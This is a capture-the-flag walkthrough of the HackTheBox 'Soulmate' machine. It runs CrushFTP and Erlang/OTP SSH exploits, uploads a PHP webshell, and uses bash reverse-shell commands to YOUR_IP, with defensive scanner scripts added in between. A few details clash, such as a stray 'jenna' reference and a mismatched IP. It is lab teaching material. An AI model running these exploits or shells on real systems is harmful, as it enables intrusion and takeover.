HackTheBox Soulmate Walkthrough

HackTheBox — Soulmate Writeup

Difficulty: Easy
OS: Linux
IP: 10.10.11.85
CVEs Exploited: CVE-2025-31161 · CVE-2025-32433


Synopsis

Soulmate is an Easy-rated Linux machine that chains two CVEs to achieve full root compromise. The attack path involves:

  1. Discovering a CrushFTP instance via vhost enumeration
  2. Exploiting CVE-2025-31161 (CrushFTP auth bypass) to create a rogue admin account
  3. Resetting ben’s password, logging into the FTP share, and uploading a PHP reverse shell to the web root
  4. Escalating to root via CVE-2025-32433 (Erlang/OTP SSH RCE) on a locally-bound SSH service

Enumeration

Nmap

nmap -sC -sV -v -p- 10.10.11.85

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://soulmate.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 redirects to http://soulmate.htb — add the entry to /etc/hosts:

10.10.11.85  soulmate.htb

Directory listing

dirsearch -u http://soulmate.htb           

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Target: http://soulmate.htb/

[16:42:53] Starting: 
[16:43:40] 403 -  564B  - /assets/                                          
[16:43:40] 301 -  178B  - /assets  ->  http://soulmate.htb/assets/          
[16:43:56] 302 -    0B  - /dashboard.php  ->  /login                        
[16:44:21] 200 -    8KB - /login.php                                        
[16:44:22] 302 -    0B  - /logout.php  ->  login.php                        
[16:44:46] 302 -    0B  - /profile.php  ->  /login                          
[16:44:50] 200 -   11KB - /register.php                                     
  
Task Completed  

The web app is a dating site with /register.php and /login.php. It has an image upload feature that only accepts png, jpg and gif; attempts to abuse the file upload went nowhere. It's mostly a dead end, so we move on to vhost enumeration.

Virtual Host Discovery

ffuf -w /home/kali/Desktop/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://soulmate.htb" -H "Host: FUZZ.soulmate.htb" -fs 154

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://soulmate.htb
 :: Wordlist         : FUZZ: /home/kali/Desktop/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.soulmate.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

ftp                       [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 157ms]
:: Progress: [4989/4989] :: 99 req/sec :: Duration: [0:00:13] :: Error: 0 ::

Found: ftp.soulmate.htb → Update /etc/hosts:

1
10.10.11.85  soulmate.htb ftp.soulmate.htb

Navigating to http://ftp.soulmate.htb reveals a CrushFTP login page, and the page itself leaks the product version. Checking the network requests in browser DevTools shows JS files versioned 11.W.657-2025_03_08_07_52, confirming this is CrushFTP 11 built in March 2025.


Foothold — CVE-2025-31161 (CrushFTP Auth Bypass)

CrushFTP 11 (pre-patch, March 2025) is vulnerable to an authentication bypass that allows creation of arbitrary admin accounts without valid credentials.

PoC: https://github.com/Immersive-Labs-Sec/CVE-2025-31161

Since CrushFTP runs as a vhost, patch the exploit to set the correct Host header:

headers = {
    "Host": "ftp.soulmate.htb",
    "Cookie": "currentAuth=31If; CrushAuth=...",
    "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
    ...
}

Run the exploit:

python3 CVE-2025-31161.py \
    --target_host 10.10.11.85 \
    --port 80 \
    --new_user attacker \
    --password 'attacker123!'
[+] User created successfully!
[*] Username: attacker
[*] Password: attacker123!

Log in as the newly created admin account. Under Admin → User Manager, we see a list of users including ben. Click on ben → Generate Random Password → Save.

Now log back in as ben with the newly set password.


PHP Webshell Upload → RCE

As ben, an FTP share called webProd is accessible — it maps directly to the soulmate.htb web root (contains index.php, login.php, dashboard.php, etc.).

Create a PHP reverse shell:

<?php system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/12345 0>&1'"); ?>

Upload shell.php via the CrushFTP web interface into the webProd folder.

Start a listener and trigger it:

nc -lvnp 12345
curl http://soulmate.htb/shell.php

rlwrap nc -lvnp 12345  
listening on [any] 12345 ...
connect to [10.10.16.37] from (UNKNOWN) [10.10.11.86] 35264
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

We have a shell as www-data.


Lateral Movement — www-data → ben

During enumeration, inspect the Erlang login scripts:

cat /usr/local/lib/erlang_login/start.escript

Inside, the Erlang SSH OTP daemon configuration reveals hardcoded credentials:

{user_passwords, [{"ben", "HouseH0ldings998"}]}
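A credential sitting inline in a service start script is exactly what a secrets scan over the deployment tree should catch before the host ships. The script below is an added example, not code from the post or the box; SAMPLE_ESCRIPT is a constructed stand-in for start.escript (the surrounding ssh:daemon call and the second account are made up for illustration). It extracts every user and password declared through the Erlang ssh daemon's user_passwords option (and the global password option), masks the secret, and emits one finding per credential.

```python
import re
from pathlib import Path

# Constructed sample modelled on the user_passwords option the post found in
# start.escript; the ssh:daemon/3 call and the "svc" account are assumptions.
SAMPLE_ESCRIPT = r'''#!/usr/bin/env escript
main(_) ->
    {ok, _Ref} = ssh:daemon({127,0,0,1}, 2222, [
        {system_dir, "/etc/ssh"},
        {user_passwords, [{"ben", "HouseH0ldings998"}, {"svc", "changeme"}]},
        {auth_methods, "password"}
    ]),
    receive stop -> ok end.
'''

# {user_passwords, [{"user", "pass"}, ...]} and the global {password, "..."} option
USER_PASSWORDS = re.compile(r'\{\s*user_passwords\s*,\s*\[(.*?)\]\s*\}', re.S)
GLOBAL_PASSWORD = re.compile(r'\{\s*password\s*,\s*"([^"]*)"\s*\}')
PAIR = re.compile(r'\{\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\}')


def find_hardcoded_ssh_passwords(source: str) -> list[tuple[str, str]]:
    """Return (user, password) pairs declared inline in an Erlang ssh daemon option list.
    The global password option is reported with user '*' because it applies to every login."""
    hits = []
    for block in USER_PASSWORDS.finditer(source):
        hits.extend(PAIR.findall(block.group(1)))
    for m in GLOBAL_PASSWORD.finditer(source):
        hits.append(("*", m.group(1)))
    return hits


def mask(secret: str) -> str:
    """Keep only the first two characters so the report never re-leaks the secret."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_source(name: str, source: str) -> list[str]:
    """One finding line per hardcoded credential, suitable for a CI log or audit ticket."""
    return [f"{name}: hardcoded SSH password for user '{user}' ({mask(pw)})"
            for user, pw in find_hardcoded_ssh_passwords(source)]


def scan_tree(root: str) -> list[str]:
    """Walk a directory and scan Erlang sources and configs (hypothetical file set)."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in {".escript", ".erl", ".config"}:
            findings.extend(scan_source(str(path), path.read_text(errors="replace")))
    return findings


if __name__ == "__main__":
    for line in scan_source("start.escript (sample)", SAMPLE_ESCRIPT):
        print(line)
```

The fix on the Erlang side is to drop the inline option in favour of the daemon's pwdfun callback backed by a proper secret store, or public-key authentication, and to make sure the start script is not world-readable by the web server account, which is how the post's www-data shell could read it.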

SSH in as ben:

ssh ben@soulmate.htb
# Password: HouseH0ldings998

Grab the user flag:

cat ~/user.txt

Privilege Escalation — CVE-2025-32433 (Erlang/OTP SSH RCE)

Enumeration

ss -tlnp
LISTEN  127.0.0.1:2222   (Erlang SSH OTP daemon)

Identifying the Version

Forward the port locally:

ssh -L 2222:127.0.0.1:2222 -N ben@soulmate.htb

Scan with nmap:

nmap -p 2222 -sV -sC 127.0.0.1
2222/tcp open  ssh  SSH-2.0-Erlang/5.2.9

Erlang/OTP SSH version 5.2.9 is vulnerable to CVE-2025-32433, a pre-authentication remote command execution flaw.
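The two things that made this service invisible to the initial scan were that it was bound to 127.0.0.1 and that nobody had fingerprinted its banner. The script below is an added example, not part of the post, that does both from the defender's side: it parses the LISTEN entries out of /proc/net/tcp (the same data ss -tlnp reads), singles out loopback-only listeners, and checks each SSH identification string against a version ceiling. SAMPLE_PROC_NET_TCP is a constructed excerpt, and AFFECTED_CEILING is an assumption holding only the version the post observed; an operator would fill it from the vendor advisory.

```python
import re
import socket

# Constructed /proc/net/tcp excerpt: header plus three sockets. The kernel writes
# IPv4 addresses as little-endian hex, ports as big-endian hex, and the state column
# as hex (0A = LISTEN), so 0100007F:08AE is 127.0.0.1:2222.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11111 1 0000000000000000 100 0 0 10 0
   1: 0100007F:08AE 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 22222 1 0000000000000000 100 0 0 10 0
   2: 0100007F:08AE 0100007F:C3A2 01 00000000:00000000 00:00000000 00000000  1000        0 33333 1 0000000000000000 20 4 30 10 -1
"""

LISTEN = "0A"


def decode_endpoint(field: str) -> tuple[str, int]:
    """Turn '0100007F:08AE' into ('127.0.0.1', 2222)."""
    addr_hex, port_hex = field.split(":")
    octets = bytes.fromhex(addr_hex)[::-1]  # undo the little-endian byte order
    return ".".join(str(b) for b in octets), int(port_hex, 16)


def listening_sockets(proc_net_tcp: str) -> list[tuple[str, int]]:
    """(ip, port) for every socket in LISTEN state, loopback-only ones included."""
    found = []
    for line in proc_net_tcp.splitlines()[1:]:
        parts = line.split()
        if len(parts) >= 4 and parts[3] == LISTEN:
            found.append(decode_endpoint(parts[1]))
    return found


def loopback_only(sockets) -> list[tuple[str, int]]:
    """Listeners an external port scan can never see."""
    return [(ip, port) for ip, port in sockets if ip.startswith("127.")]


# SSH-2.0-<software>/<version>; OpenSSH uses '_' instead of '/', so it is left alone.
BANNER = re.compile(r"^SSH-2\.0-([A-Za-z]+)/(\d+(?:\.\d+)*)")

# Assumption: maintained by the operator from vendor advisories. It holds only the
# version the post observed, so versions at or below 5.2.9 are flagged.
AFFECTED_CEILING = {"Erlang": "5.2.9"}


def parse_ssh_banner(banner: str):
    m = BANNER.match(banner.strip())
    return (m.group(1), m.group(2)) if m else None


def version_tuple(v: str) -> tuple[int, ...]:
    return tuple(int(x) for x in v.split("."))


def is_suspect(banner: str) -> bool:
    """True when the banner names software whose version is at or below the ceiling."""
    parsed = parse_ssh_banner(banner)
    if parsed is None:
        return False
    software, version = parsed
    ceiling = AFFECTED_CEILING.get(software)
    return ceiling is not None and version_tuple(version) <= version_tuple(ceiling)


def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    """Read the SSH identification line; the server sends it before any client data."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        lines = s.recv(256).decode("ascii", errors="replace").splitlines()
    return lines[0] if lines else ""


if __name__ == "__main__":
    # Offline demo on the constructed table; on a live host read /proc/net/tcp and
    # call grab_banner() for each loopback listener instead.
    for ip, port in loopback_only(listening_sockets(SAMPLE_PROC_NET_TCP)):
        print(f"loopback-only listener {ip}:{port}")
    sample_banner = "SSH-2.0-Erlang/5.2.9"
    print(sample_banner, "suspect" if is_suspect(sample_banner) else "ok")
```

Run on the host itself (or from a config-management agent) this turns "always fingerprint SSH banners" into a scheduled check, and it is the loopback list that matters most: a service bound to 127.0.0.1 is still one local foothold away from being reachable, as the port forward in the next step shows.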

Exploitation

Download a public PoC for CVE-2025-32433, start a listener, and execute:

nc -lvnp 9090

python3 exploit.py \
    --target 127.0.0.1 \
    --port 2222 \
    --command "bash -c 'bash -i >& /dev/tcp/YOUR_IP/9090 0>&1'"
[+] Received banner: SSH-2.0-Erlang/5.2.9
[✓] Exploit sent! Command executed.
root@soulmate:/# id
uid=0(root) gid=0(root) groups=0(root)

Grab the root flag:

cat /root/root.txt

Attack Chain Summary

[Recon] nmap → ports 22, 80
    ↓
[vhost enum] ffuf → ftp.soulmate.htb (CrushFTP 11)
    ↓
[CVE-2025-31161] Auth bypass → rogue admin account
    ↓
[User Manager] Reset ben's password → access webProd share
    ↓
[RCE] Upload PHP shell → www-data shell
    ↓
[Creds] Hardcoded password in Erlang script → SSH as ben → user.txt
    ↓
[CVE-2025-32433] Erlang/OTP SSH 5.2.9 RCE → root shell → root.txt

Key Takeaways

  • Vhost enumeration is critical — the real attack surface was hidden behind a subdomain
  • CrushFTP had a severe auth bypass (CVE-2025-31161) allowing full admin access without credentials
  • Hardcoded passwords in application scripts are a common way to pivot between users
  • Erlang/OTP SSH servers are uncommon in CTFs but carry real critical CVEs — always fingerprint SSH banners
  • Assumed breach credentials (jenna) provided an entry point for reconnaissance, but the actual exploit chain didn’t require them

Tools & References

Tool / CVE                 Purpose
nmap                       Port & service enumeration
ffuf                       Virtual host discovery
CVE-2025-31161             CrushFTP 11 auth bypass → admin account creation
CrushFTP Web UI            Password reset, file upload
nc / bash reverse shell    RCE via PHP webshell
CVE-2025-32433             Erlang/OTP SSH 5.2.9 pre-auth RCE
ssh -L                     Local port forwarding

Happy hacking!

This post is licensed under CC BY 4.0 by the author.